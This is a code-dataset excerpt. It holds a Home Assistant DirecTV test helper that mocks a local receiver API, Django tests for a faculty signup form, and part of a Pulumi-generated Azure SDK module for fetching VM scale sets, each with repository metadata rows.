        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Client 2CA17D1CD30X is tuned to a regular program.
    aioclient_mock.get(
        f"http://{HOST}:8080/tv/getTuned",
        params={"clientAddr": "2CA17D1CD30X"},
        text=load_fixture("directv/tv-get-tuned.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Client A01234567890 is tuned to a music channel.
    aioclient_mock.get(
        f"http://{HOST}:8080/tv/getTuned",
        params={"clientAddr": "A01234567890"},
        text=load_fixture("directv/tv-get-tuned-music.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Client C01234567890 is watching restricted (forbidden) content.
    aioclient_mock.get(
        f"http://{HOST}:8080/tv/getTuned",
        params={"clientAddr": "C01234567890"},
        status=HTTPStatus.FORBIDDEN,
        text=load_fixture("directv/tv-get-tuned-restricted.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Default getTuned response: a movie.
    aioclient_mock.get(
        f"http://{HOST}:8080/tv/getTuned",
        text=load_fixture("directv/tv-get-tuned-movie.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
async def setup_integration(
    hass: HomeAssistant,
    aioclient_mock: AiohttpClientMocker,
    skip_entry_setup: bool = False,
    setup_error: bool = False,
) -> MockConfigEntry:
    """Set up the DirecTV integration in Home Assistant.

    skip_entry_setup: register the config entry without setting it up.
    setup_error: mock the receiver's version endpoint with HTTP 500 so
        that setup fails.
    """
    if setup_error:
        # Only the version endpoint is mocked (as an error), so setup aborts.
        aioclient_mock.get(
            f"http://{HOST}:8080/info/getVersion",
            status=HTTPStatus.INTERNAL_SERVER_ERROR,
        )
    else:
        mock_connection(aioclient_mock)
    entry = MockConfigEntry(
        domain=DOMAIN,
        unique_id=RECEIVER_ID,
        data={CONF_HOST: HOST, CONF_RECEIVER_ID: RECEIVER_ID},
    )
    entry.add_to_hass(hass)
    if not skip_entry_setup:
        await hass.config_entries.async_setup(entry.entry_id)
        await hass.async_block_till_done()
    return entry
| 31.603175 | 75 | 0.668257 | from http import HTTPStatus
from homeassistant.components.directv.const import CONF_RECEIVER_ID, DOMAIN
from homeassistant.components.ssdp import ATTR_SSDP_LOCATION
from homeassistant.const import CONF_HOST, CONTENT_TYPE_JSON
from homeassistant.core import HomeAssistant
from tests.common import MockConfigEntry, load_fixture
from tests.test_util.aiohttp import AiohttpClientMocker
HOST = "127.0.0.1"
RECEIVER_ID = "028877455858"
SSDP_LOCATION = "http://127.0.0.1/"
UPNP_SERIAL = "RID-028877455858"
MOCK_CONFIG = {DOMAIN: [{CONF_HOST: HOST}]}
MOCK_SSDP_DISCOVERY_INFO = {ATTR_SSDP_LOCATION: SSDP_LOCATION}
MOCK_USER_INPUT = {CONF_HOST: HOST}
def mock_connection(aioclient_mock: AiohttpClientMocker) -> None:
    """Mock the DirecTV receiver's HTTP API for Home Assistant tests.

    Registers canned JSON fixture responses for every endpoint the
    integration calls. Param-specific responses are registered before the
    generic one for the same URL — presumably matched in registration
    order by AiohttpClientMocker (TODO confirm).
    """
    # Receiver software version.
    aioclient_mock.get(
        f"http://{HOST}:8080/info/getVersion",
        text=load_fixture("directv/info-get-version.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Known client devices / locations.
    aioclient_mock.get(
        f"http://{HOST}:8080/info/getLocations",
        text=load_fixture("directv/info-get-locations.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Client B01234567890 reports standby mode.
    aioclient_mock.get(
        f"http://{HOST}:8080/info/mode",
        params={"clientAddr": "B01234567890"},
        text=load_fixture("directv/info-mode-standby.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Client 9XXXXXXXXXX9 simulates a server error on the mode query.
    aioclient_mock.get(
        f"http://{HOST}:8080/info/mode",
        params={"clientAddr": "9XXXXXXXXXX9"},
        status=HTTPStatus.INTERNAL_SERVER_ERROR,
        text=load_fixture("directv/info-mode-error.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Default mode response for any other client.
    aioclient_mock.get(
        f"http://{HOST}:8080/info/mode",
        text=load_fixture("directv/info-mode.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Remote-control key presses.
    aioclient_mock.get(
        f"http://{HOST}:8080/remote/processKey",
        text=load_fixture("directv/remote-process-key.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Channel tuning.
    aioclient_mock.get(
        f"http://{HOST}:8080/tv/tune",
        text=load_fixture("directv/tv-tune.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Client 2CA17D1CD30X is tuned to a regular program.
    aioclient_mock.get(
        f"http://{HOST}:8080/tv/getTuned",
        params={"clientAddr": "2CA17D1CD30X"},
        text=load_fixture("directv/tv-get-tuned.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Client A01234567890 is tuned to a music channel.
    aioclient_mock.get(
        f"http://{HOST}:8080/tv/getTuned",
        params={"clientAddr": "A01234567890"},
        text=load_fixture("directv/tv-get-tuned-music.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Client C01234567890 is watching restricted (forbidden) content.
    aioclient_mock.get(
        f"http://{HOST}:8080/tv/getTuned",
        params={"clientAddr": "C01234567890"},
        status=HTTPStatus.FORBIDDEN,
        text=load_fixture("directv/tv-get-tuned-restricted.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
    # Default getTuned response: a movie.
    aioclient_mock.get(
        f"http://{HOST}:8080/tv/getTuned",
        text=load_fixture("directv/tv-get-tuned-movie.json"),
        headers={"Content-Type": CONTENT_TYPE_JSON},
    )
async def setup_integration(
    hass: HomeAssistant,
    aioclient_mock: AiohttpClientMocker,
    skip_entry_setup: bool = False,
    setup_error: bool = False,
) -> MockConfigEntry:
    """Register (and optionally set up) the DirecTV config entry for a test.

    hass: Home Assistant test instance.
    aioclient_mock: aiohttp client mocker used to fake receiver responses.
    skip_entry_setup: when True, only register the entry without setting it up.
    setup_error: when True, mock the version probe as a 500 so setup fails.
    Returns the registered MockConfigEntry.
    """
    if setup_error:
        # Only the version probe is mocked (as a 500): the client's first
        # request fails before any other endpoint is needed.
        aioclient_mock.get(
            f"http://{HOST}:8080/info/getVersion",
            status=HTTPStatus.INTERNAL_SERVER_ERROR,
        )
    else:
        mock_connection(aioclient_mock)
    entry = MockConfigEntry(
        domain=DOMAIN,
        unique_id=RECEIVER_ID,
        data={CONF_HOST: HOST, CONF_RECEIVER_ID: RECEIVER_ID},
    )
    entry.add_to_hass(hass)
    if not skip_entry_setup:
        await hass.config_entries.async_setup(entry.entry_id)
        # Flush pending setup tasks so the entry reaches its final state
        # before the test continues.
        await hass.async_block_till_done()
    return entry
| true | true |
79012277efcc80bf75bc48523cd2e8a4d97738ec | 2,422 | py | Python | Pinocchio/faculty/tests/test_forms.py | shreygoel7/Pinocchio | b08c6dde591f0de948ef67db7ad83bf8fc4bfa62 | [
"MIT"
] | null | null | null | Pinocchio/faculty/tests/test_forms.py | shreygoel7/Pinocchio | b08c6dde591f0de948ef67db7ad83bf8fc4bfa62 | [
"MIT"
] | null | null | null | Pinocchio/faculty/tests/test_forms.py | shreygoel7/Pinocchio | b08c6dde591f0de948ef67db7ad83bf8fc4bfa62 | [
"MIT"
] | 1 | 2021-11-27T09:23:20.000Z | 2021-11-27T09:23:20.000Z | from academicInfo.models import Department
from faculty.forms import FacultySignupForm
from faculty.models import Faculty
from django.contrib.auth.models import User
from django.test import TestCase
from django.utils import timezone
class FacultySignupFormTest(TestCase):
    """Tests for ``FacultySignupForm``: field labels, required flags and
    email-uniqueness validation."""
    def test_signup_form_label(self):
        """The form exposes the expected human-readable label for each field."""
        form = FacultySignupForm()
        self.assertTrue(
            form.fields['first_name'].label == 'First Name' and
            form.fields['last_name'].label == 'Last Name' and
            form.fields['username'].label == 'Roll number' and
            form.fields['dob'].label == 'Date of Birth' and
            form.fields['department'].label == 'Department' and
            form.fields['email'].label == 'Email'
        )
    def test_signup_form_required_fields(self):
        """Every personal-detail field is marked as required."""
        form = FacultySignupForm()
        self.assertTrue(
            form.fields['first_name'].required == True and
            form.fields['last_name'].required == True and
            form.fields['dob'].required == True and
            form.fields['department'].required == True and
            form.fields['email'].required == True
        )
    def test_invalid_email_validation(self):
        """A signup using an email already owned by a faculty member fails."""
        startTime = timezone.now()
        department = Department.objects.create(name='test department')
        user = User.objects.create(
            username='test',
            email='test@gmail.com'
        )
        faculty = Faculty.objects.create(
            user=user,
            dob=startTime,
            department=department
        )
        # Same email as the faculty user created above -> must be rejected.
        form = FacultySignupForm(
            data = {
                'username': 'test1',
                'email': 'test@gmail.com',
                'dob': startTime,
                'department': department
            }
        )
        self.assertFalse(form.is_valid())
    def test_valid_email_validation(self):
        """A complete submission with an unused email passes validation."""
        startTime = timezone.now()
        department = Department.objects.create(name='test department')
        form = FacultySignupForm(
            data = {
                'username': 'test',
                'first_name': 'Bob',
                'last_name': 'Davidson',
                'dob': startTime,
                'email': 'test@gmail.com',
                'password1': 'complex1password',
                'password2': 'complex1password',
                'department': department
            }
        )
        self.assertTrue(form.is_valid())
| 32.293333 | 70 | 0.565648 | from academicInfo.models import Department
from faculty.forms import FacultySignupForm
from faculty.models import Faculty
from django.contrib.auth.models import User
from django.test import TestCase
from django.utils import timezone
class FacultySignupFormTest(TestCase):
    """Tests for ``FacultySignupForm``: field labels, required flags and
    email-uniqueness validation."""

    def test_signup_form_label(self):
        """The form exposes the expected human-readable label for each field."""
        form = FacultySignupForm()
        expected_labels = {
            'first_name': 'First Name',
            'last_name': 'Last Name',
            'username': 'Roll number',
            'dob': 'Date of Birth',
            'department': 'Department',
            'email': 'Email',
        }
        self.assertTrue(
            all(
                form.fields[field_name].label == label
                for field_name, label in expected_labels.items()
            )
        )

    def test_signup_form_required_fields(self):
        """Every personal-detail field is marked as required."""
        form = FacultySignupForm()
        required_fields = ('first_name', 'last_name', 'dob', 'department', 'email')
        self.assertTrue(
            all(form.fields[field_name].required for field_name in required_fields)
        )

    def test_invalid_email_validation(self):
        """A signup using an email already owned by a faculty member fails."""
        now = timezone.now()
        department = Department.objects.create(name='test department')
        existing_user = User.objects.create(
            username='test',
            email='test@gmail.com'
        )
        Faculty.objects.create(
            user=existing_user,
            dob=now,
            department=department
        )
        # Same email as the faculty user created above -> must be rejected.
        duplicate_form = FacultySignupForm(
            data={
                'username': 'test1',
                'email': 'test@gmail.com',
                'dob': now,
                'department': department
            }
        )
        self.assertFalse(duplicate_form.is_valid())

    def test_valid_email_validation(self):
        """A complete submission with an unused email passes validation."""
        now = timezone.now()
        department = Department.objects.create(name='test department')
        signup_form = FacultySignupForm(
            data={
                'username': 'test',
                'first_name': 'Bob',
                'last_name': 'Davidson',
                'dob': now,
                'email': 'test@gmail.com',
                'password1': 'complex1password',
                'password2': 'complex1password',
                'department': department
            }
        )
        self.assertTrue(signup_form.is_valid())
| true | true |
790122b3d487f06bf6368199e38049d67c197daf | 17,549 | py | Python | sdk/python/pulumi_azure_native/compute/get_virtual_machine_scale_set.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/compute/get_virtual_machine_scale_set.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/compute/get_virtual_machine_scale_set.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetVirtualMachineScaleSetResult',
'AwaitableGetVirtualMachineScaleSetResult',
'get_virtual_machine_scale_set',
]
@pulumi.output_type
class GetVirtualMachineScaleSetResult:
"""
Describes a Virtual Machine Scale Set.
"""
def __init__(__self__, additional_capabilities=None, automatic_repairs_policy=None, do_not_run_extensions_on_overprovisioned_vms=None, extended_location=None, host_group=None, id=None, identity=None, location=None, name=None, orchestration_mode=None, overprovision=None, plan=None, platform_fault_domain_count=None, provisioning_state=None, proximity_placement_group=None, scale_in_policy=None, single_placement_group=None, sku=None, tags=None, type=None, unique_id=None, upgrade_policy=None, virtual_machine_profile=None, zone_balance=None, zones=None):
if additional_capabilities and not isinstance(additional_capabilities, dict):
raise TypeError("Expected argument 'additional_capabilities' to be a dict")
pulumi.set(__self__, "additional_capabilities", additional_capabilities)
if automatic_repairs_policy and not isinstance(automatic_repairs_policy, dict):
raise TypeError("Expected argument 'automatic_repairs_policy' to be a dict")
pulumi.set(__self__, "automatic_repairs_policy", automatic_repairs_policy)
if do_not_run_extensions_on_overprovisioned_vms and not isinstance(do_not_run_extensions_on_overprovisioned_vms, bool):
raise TypeError("Expected argument 'do_not_run_extensions_on_overprovisioned_vms' to be a bool")
pulumi.set(__self__, "do_not_run_extensions_on_overprovisioned_vms", do_not_run_extensions_on_overprovisioned_vms)
if extended_location and not isinstance(extended_location, dict):
raise TypeError("Expected argument 'extended_location' to be a dict")
pulumi.set(__self__, "extended_location", extended_location)
if host_group and not isinstance(host_group, dict):
raise TypeError("Expected argument 'host_group' to be a dict")
pulumi.set(__self__, "host_group", host_group)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if identity and not isinstance(identity, dict):
raise TypeError("Expected argument 'identity' to be a dict")
pulumi.set(__self__, "identity", identity)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if orchestration_mode and not isinstance(orchestration_mode, str):
raise TypeError("Expected argument 'orchestration_mode' to be a str")
pulumi.set(__self__, "orchestration_mode", orchestration_mode)
if overprovision and not isinstance(overprovision, bool):
raise TypeError("Expected argument 'overprovision' to be a bool")
pulumi.set(__self__, "overprovision", overprovision)
if plan and not isinstance(plan, dict):
raise TypeError("Expected argument 'plan' to be a dict")
pulumi.set(__self__, "plan", plan)
if platform_fault_domain_count and not isinstance(platform_fault_domain_count, int):
raise TypeError("Expected argument 'platform_fault_domain_count' to be a int")
pulumi.set(__self__, "platform_fault_domain_count", platform_fault_domain_count)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if proximity_placement_group and not isinstance(proximity_placement_group, dict):
raise TypeError("Expected argument 'proximity_placement_group' to be a dict")
pulumi.set(__self__, "proximity_placement_group", proximity_placement_group)
if scale_in_policy and not isinstance(scale_in_policy, dict):
raise TypeError("Expected argument 'scale_in_policy' to be a dict")
pulumi.set(__self__, "scale_in_policy", scale_in_policy)
if single_placement_group and not isinstance(single_placement_group, bool):
raise TypeError("Expected argument 'single_placement_group' to be a bool")
pulumi.set(__self__, "single_placement_group", single_placement_group)
if sku and not isinstance(sku, dict):
raise TypeError("Expected argument 'sku' to be a dict")
pulumi.set(__self__, "sku", sku)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if unique_id and not isinstance(unique_id, str):
raise TypeError("Expected argument 'unique_id' to be a str")
pulumi.set(__self__, "unique_id", unique_id)
if upgrade_policy and not isinstance(upgrade_policy, dict):
raise TypeError("Expected argument 'upgrade_policy' to be a dict")
pulumi.set(__self__, "upgrade_policy", upgrade_policy)
if virtual_machine_profile and not isinstance(virtual_machine_profile, dict):
raise TypeError("Expected argument 'virtual_machine_profile' to be a dict")
pulumi.set(__self__, "virtual_machine_profile", virtual_machine_profile)
if zone_balance and not isinstance(zone_balance, bool):
raise TypeError("Expected argument 'zone_balance' to be a bool")
pulumi.set(__self__, "zone_balance", zone_balance)
if zones and not isinstance(zones, list):
raise TypeError("Expected argument 'zones' to be a list")
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="additionalCapabilities")
def additional_capabilities(self) -> Optional['outputs.AdditionalCapabilitiesResponse']:
"""
Specifies additional capabilities enabled or disabled on the Virtual Machines in the Virtual Machine Scale Set. For instance: whether the Virtual Machines have the capability to support attaching managed data disks with UltraSSD_LRS storage account type.
"""
return pulumi.get(self, "additional_capabilities")
@property
@pulumi.getter(name="automaticRepairsPolicy")
def automatic_repairs_policy(self) -> Optional['outputs.AutomaticRepairsPolicyResponse']:
"""
Policy for automatic repairs.
"""
return pulumi.get(self, "automatic_repairs_policy")
@property
@pulumi.getter(name="doNotRunExtensionsOnOverprovisionedVMs")
def do_not_run_extensions_on_overprovisioned_vms(self) -> Optional[bool]:
"""
When Overprovision is enabled, extensions are launched only on the requested number of VMs which are finally kept. This property will hence ensure that the extensions do not run on the extra overprovisioned VMs.
"""
return pulumi.get(self, "do_not_run_extensions_on_overprovisioned_vms")
@property
@pulumi.getter(name="extendedLocation")
def extended_location(self) -> Optional['outputs.ExtendedLocationResponse']:
"""
The extended location of the Virtual Machine Scale Set.
"""
return pulumi.get(self, "extended_location")
@property
@pulumi.getter(name="hostGroup")
def host_group(self) -> Optional['outputs.SubResourceResponse']:
"""
Specifies information about the dedicated host group that the virtual machine scale set resides in. <br><br>Minimum api-version: 2020-06-01.
"""
return pulumi.get(self, "host_group")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def identity(self) -> Optional['outputs.VirtualMachineScaleSetIdentityResponse']:
"""
The identity of the virtual machine scale set, if configured.
"""
return pulumi.get(self, "identity")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="orchestrationMode")
def orchestration_mode(self) -> Optional[str]:
"""
Specifies the orchestration mode for the virtual machine scale set.
"""
return pulumi.get(self, "orchestration_mode")
@property
@pulumi.getter
def overprovision(self) -> Optional[bool]:
"""
Specifies whether the Virtual Machine Scale Set should be overprovisioned.
"""
return pulumi.get(self, "overprovision")
@property
@pulumi.getter
def plan(self) -> Optional['outputs.PlanResponse']:
"""
Specifies information about the marketplace image used to create the virtual machine. This element is only used for marketplace images. Before you can use a marketplace image from an API, you must enable the image for programmatic use. In the Azure portal, find the marketplace image that you want to use and then click **Want to deploy programmatically, Get Started ->**. Enter any required information and then click **Save**.
"""
return pulumi.get(self, "plan")
@property
@pulumi.getter(name="platformFaultDomainCount")
def platform_fault_domain_count(self) -> Optional[int]:
"""
Fault Domain count for each placement group.
"""
return pulumi.get(self, "platform_fault_domain_count")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="proximityPlacementGroup")
def proximity_placement_group(self) -> Optional['outputs.SubResourceResponse']:
"""
Specifies information about the proximity placement group that the virtual machine scale set should be assigned to. <br><br>Minimum api-version: 2018-04-01.
"""
return pulumi.get(self, "proximity_placement_group")
@property
@pulumi.getter(name="scaleInPolicy")
def scale_in_policy(self) -> Optional['outputs.ScaleInPolicyResponse']:
"""
Specifies the scale-in policy that decides which virtual machines are chosen for removal when a Virtual Machine Scale Set is scaled-in.
"""
return pulumi.get(self, "scale_in_policy")
@property
@pulumi.getter(name="singlePlacementGroup")
def single_placement_group(self) -> Optional[bool]:
"""
When true this limits the scale set to a single placement group, of max size 100 virtual machines. NOTE: If singlePlacementGroup is true, it may be modified to false. However, if singlePlacementGroup is false, it may not be modified to true.
"""
return pulumi.get(self, "single_placement_group")
@property
@pulumi.getter
def sku(self) -> Optional['outputs.SkuResponse']:
"""
The virtual machine scale set sku.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="uniqueId")
def unique_id(self) -> str:
"""
Specifies the ID which uniquely identifies a Virtual Machine Scale Set.
"""
return pulumi.get(self, "unique_id")
@property
@pulumi.getter(name="upgradePolicy")
def upgrade_policy(self) -> Optional['outputs.UpgradePolicyResponse']:
"""
The upgrade policy.
"""
return pulumi.get(self, "upgrade_policy")
@property
@pulumi.getter(name="virtualMachineProfile")
def virtual_machine_profile(self) -> Optional['outputs.VirtualMachineScaleSetVMProfileResponse']:
"""
The virtual machine profile.
"""
return pulumi.get(self, "virtual_machine_profile")
@property
@pulumi.getter(name="zoneBalance")
def zone_balance(self) -> Optional[bool]:
"""
Whether to force strictly even Virtual Machine distribution cross x-zones in case there is zone outage.
"""
return pulumi.get(self, "zone_balance")
@property
@pulumi.getter
def zones(self) -> Optional[Sequence[str]]:
"""
The virtual machine scale set zones. NOTE: Availability zones can only be set when you create the scale set
"""
return pulumi.get(self, "zones")
class AwaitableGetVirtualMachineScaleSetResult(GetVirtualMachineScaleSetResult):
    """Awaitable wrapper around ``GetVirtualMachineScaleSetResult``.

    Allows the (already resolved) invoke result to be used with ``await``
    in async Pulumi programs as well as accessed directly.
    """
    # pylint: disable=using-constant-test
    def __await__(self):
        # The unreachable `yield` makes this method a generator (required by
        # the await protocol) without ever actually yielding; awaiting simply
        # returns a plain result built from the already-populated fields.
        if False:
            yield self
        return GetVirtualMachineScaleSetResult(
            additional_capabilities=self.additional_capabilities,
            automatic_repairs_policy=self.automatic_repairs_policy,
            do_not_run_extensions_on_overprovisioned_vms=self.do_not_run_extensions_on_overprovisioned_vms,
            extended_location=self.extended_location,
            host_group=self.host_group,
            id=self.id,
            identity=self.identity,
            location=self.location,
            name=self.name,
            orchestration_mode=self.orchestration_mode,
            overprovision=self.overprovision,
            plan=self.plan,
            platform_fault_domain_count=self.platform_fault_domain_count,
            provisioning_state=self.provisioning_state,
            proximity_placement_group=self.proximity_placement_group,
            scale_in_policy=self.scale_in_policy,
            single_placement_group=self.single_placement_group,
            sku=self.sku,
            tags=self.tags,
            type=self.type,
            unique_id=self.unique_id,
            upgrade_policy=self.upgrade_policy,
            virtual_machine_profile=self.virtual_machine_profile,
            zone_balance=self.zone_balance,
            zones=self.zones)
def get_virtual_machine_scale_set(expand: Optional[str] = None,
                                  resource_group_name: Optional[str] = None,
                                  vm_scale_set_name: Optional[str] = None,
                                  opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetVirtualMachineScaleSetResult:
    """
    Describes a Virtual Machine Scale Set.
    API Version: 2021-03-01.

    :param str expand: The expand expression to apply on the operation. 'UserData' retrieves the UserData property of the VM scale set that was provided by the user during the VM scale set Create/Update operation
    :param str resource_group_name: The name of the resource group.
    :param str vm_scale_set_name: The name of the VM scale set.
    :return: An awaitable result describing the scale set.
    """
    __args__ = dict()
    __args__['expand'] = expand
    __args__['resourceGroupName'] = resource_group_name
    __args__['vmScaleSetName'] = vm_scale_set_name
    # Default the invoke options and pin them to this SDK's version so the
    # engine resolves the matching provider plugin.
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    __ret__ = pulumi.runtime.invoke('azure-native:compute:getVirtualMachineScaleSet', __args__, opts=opts, typ=GetVirtualMachineScaleSetResult).value
    # Re-wrap the typed result in the awaitable subclass expected by callers.
    return AwaitableGetVirtualMachineScaleSetResult(
        additional_capabilities=__ret__.additional_capabilities,
        automatic_repairs_policy=__ret__.automatic_repairs_policy,
        do_not_run_extensions_on_overprovisioned_vms=__ret__.do_not_run_extensions_on_overprovisioned_vms,
        extended_location=__ret__.extended_location,
        host_group=__ret__.host_group,
        id=__ret__.id,
        identity=__ret__.identity,
        location=__ret__.location,
        name=__ret__.name,
        orchestration_mode=__ret__.orchestration_mode,
        overprovision=__ret__.overprovision,
        plan=__ret__.plan,
        platform_fault_domain_count=__ret__.platform_fault_domain_count,
        provisioning_state=__ret__.provisioning_state,
        proximity_placement_group=__ret__.proximity_placement_group,
        scale_in_policy=__ret__.scale_in_policy,
        single_placement_group=__ret__.single_placement_group,
        sku=__ret__.sku,
        tags=__ret__.tags,
        type=__ret__.type,
        unique_id=__ret__.unique_id,
        upgrade_policy=__ret__.upgrade_policy,
        virtual_machine_profile=__ret__.virtual_machine_profile,
        zone_balance=__ret__.zone_balance,
        zones=__ret__.zones)
| 45.819843 | 558 | 0.690182 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetVirtualMachineScaleSetResult',
'AwaitableGetVirtualMachineScaleSetResult',
'get_virtual_machine_scale_set',
]
@pulumi.output_type
class GetVirtualMachineScaleSetResult:
def __init__(__self__, additional_capabilities=None, automatic_repairs_policy=None, do_not_run_extensions_on_overprovisioned_vms=None, extended_location=None, host_group=None, id=None, identity=None, location=None, name=None, orchestration_mode=None, overprovision=None, plan=None, platform_fault_domain_count=None, provisioning_state=None, proximity_placement_group=None, scale_in_policy=None, single_placement_group=None, sku=None, tags=None, type=None, unique_id=None, upgrade_policy=None, virtual_machine_profile=None, zone_balance=None, zones=None):
if additional_capabilities and not isinstance(additional_capabilities, dict):
raise TypeError("Expected argument 'additional_capabilities' to be a dict")
pulumi.set(__self__, "additional_capabilities", additional_capabilities)
if automatic_repairs_policy and not isinstance(automatic_repairs_policy, dict):
raise TypeError("Expected argument 'automatic_repairs_policy' to be a dict")
pulumi.set(__self__, "automatic_repairs_policy", automatic_repairs_policy)
if do_not_run_extensions_on_overprovisioned_vms and not isinstance(do_not_run_extensions_on_overprovisioned_vms, bool):
raise TypeError("Expected argument 'do_not_run_extensions_on_overprovisioned_vms' to be a bool")
pulumi.set(__self__, "do_not_run_extensions_on_overprovisioned_vms", do_not_run_extensions_on_overprovisioned_vms)
if extended_location and not isinstance(extended_location, dict):
raise TypeError("Expected argument 'extended_location' to be a dict")
pulumi.set(__self__, "extended_location", extended_location)
if host_group and not isinstance(host_group, dict):
raise TypeError("Expected argument 'host_group' to be a dict")
pulumi.set(__self__, "host_group", host_group)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if identity and not isinstance(identity, dict):
raise TypeError("Expected argument 'identity' to be a dict")
pulumi.set(__self__, "identity", identity)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if orchestration_mode and not isinstance(orchestration_mode, str):
raise TypeError("Expected argument 'orchestration_mode' to be a str")
pulumi.set(__self__, "orchestration_mode", orchestration_mode)
if overprovision and not isinstance(overprovision, bool):
raise TypeError("Expected argument 'overprovision' to be a bool")
pulumi.set(__self__, "overprovision", overprovision)
if plan and not isinstance(plan, dict):
raise TypeError("Expected argument 'plan' to be a dict")
pulumi.set(__self__, "plan", plan)
if platform_fault_domain_count and not isinstance(platform_fault_domain_count, int):
raise TypeError("Expected argument 'platform_fault_domain_count' to be a int")
pulumi.set(__self__, "platform_fault_domain_count", platform_fault_domain_count)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if proximity_placement_group and not isinstance(proximity_placement_group, dict):
raise TypeError("Expected argument 'proximity_placement_group' to be a dict")
pulumi.set(__self__, "proximity_placement_group", proximity_placement_group)
if scale_in_policy and not isinstance(scale_in_policy, dict):
raise TypeError("Expected argument 'scale_in_policy' to be a dict")
pulumi.set(__self__, "scale_in_policy", scale_in_policy)
if single_placement_group and not isinstance(single_placement_group, bool):
raise TypeError("Expected argument 'single_placement_group' to be a bool")
pulumi.set(__self__, "single_placement_group", single_placement_group)
if sku and not isinstance(sku, dict):
raise TypeError("Expected argument 'sku' to be a dict")
pulumi.set(__self__, "sku", sku)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if unique_id and not isinstance(unique_id, str):
raise TypeError("Expected argument 'unique_id' to be a str")
pulumi.set(__self__, "unique_id", unique_id)
if upgrade_policy and not isinstance(upgrade_policy, dict):
raise TypeError("Expected argument 'upgrade_policy' to be a dict")
pulumi.set(__self__, "upgrade_policy", upgrade_policy)
if virtual_machine_profile and not isinstance(virtual_machine_profile, dict):
raise TypeError("Expected argument 'virtual_machine_profile' to be a dict")
pulumi.set(__self__, "virtual_machine_profile", virtual_machine_profile)
if zone_balance and not isinstance(zone_balance, bool):
raise TypeError("Expected argument 'zone_balance' to be a bool")
pulumi.set(__self__, "zone_balance", zone_balance)
if zones and not isinstance(zones, list):
raise TypeError("Expected argument 'zones' to be a list")
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="additionalCapabilities")
def additional_capabilities(self) -> Optional['outputs.AdditionalCapabilitiesResponse']:
return pulumi.get(self, "additional_capabilities")
@property
@pulumi.getter(name="automaticRepairsPolicy")
def automatic_repairs_policy(self) -> Optional['outputs.AutomaticRepairsPolicyResponse']:
return pulumi.get(self, "automatic_repairs_policy")
@property
@pulumi.getter(name="doNotRunExtensionsOnOverprovisionedVMs")
